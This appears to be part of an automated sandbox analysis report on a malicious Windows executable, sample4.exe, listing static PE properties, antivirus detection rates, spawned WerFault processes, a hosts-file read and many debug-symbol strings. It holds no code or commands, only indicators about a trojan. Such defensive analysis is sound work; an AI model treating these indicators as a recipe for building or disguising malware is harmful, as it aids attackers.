          Source: sample4.exe, 00000000.00000002.568529716.0000000001370000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs sample4.exe
          Source: sample4.exe, 00000000.00000002.567097557.00000000002C4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamearra.exe` vs sample4.exe
          Source: sample4.exeBinary or memory string: OriginalFilenamearra.exe` vs sample4.exe
          Source: sample4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: classification engineClassification label: mal100.troj.evad.winEXE@6/20@8/2
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0012D0B0 FindResourceW,LoadResource,LockResource,GlobalFree,0_2_0012D0B0
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2100
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERABCC.tmpJump to behavior
          Source: sample4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\sample4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\sample4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\sample4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: sample4.exeVirustotal: Detection: 77%
          Source: sample4.exeReversingLabs: Detection: 79%
          Source: unknownProcess created: C:\Users\user\Desktop\sample4.exe 'C:\Users\user\Desktop\sample4.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 768
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 804
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 896
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 924
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 1224
          Source: sample4.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: sample4.exeStatic file information: File size 2136576 > 1048576
          Source: sample4.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1b0400
          Source: sample4.exeStatic PE information: More than 200 imports for USER32.dll
          Source: sample4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: sample4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: sample4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: sample4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: sample4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: sample4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: sample4.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: sample4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000011.00000003.373483424.0000000004FC2000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdbT source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb6 source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb7 source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.373483424.0000000004FC2000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb) source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdb? source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: winnsi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: dnsapi.pdbf source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: schannel.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: rasadhlp.pdbt source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb- source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb, source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdbx source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdbl source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: comdlg32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdb| source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: nsi.pdb source: WerFault.exe, 00000011.00000003.373534997.0000000004FD3000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391511057.0000000004C84000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: webio.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: oleacc.pdb1 source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb7 source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdbH source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb# source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdb~ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: msimg32.pdbT source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb1 source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb/ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: comctl32v582.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: ole32.pdb) source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb/ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb& source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb` source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wininet.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: oleacc.pdb^ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdb" source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: ncryptsslp.pdb= source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: c:\Schoolwheel\Commontie\hithere\anyhit\Subtractmountain\TakeLand\Whilecardstone.pdb source: sample4.exe
          Source: Binary string: nsi.pdb_ source: WerFault.exe, 00000011.00000003.373534997.0000000004FD3000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391511057.0000000004C84000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdbh source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wininet.pdb; source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: oleacc.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb; source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wininet.pdbJ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb# source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: winnsi.pdbZ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: mskeyprotect.pdb_ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb5 source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb- source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb% source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: msimg32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdbF source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb, source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp
          Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000011.00000003.368397809.0000000004C0E000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.385905313.0000000004A4D000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.409232348.0000000002FAA000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.436877307.00000000051E4000.00000004.00000001.sdmp
          Source: Binary string: Windows.Storage.pdb# source: WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp
          Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb@ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000011.00000003.368794303.0000000003011000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.385888353.0000000002BCD000.00000004.00000001.sdmp
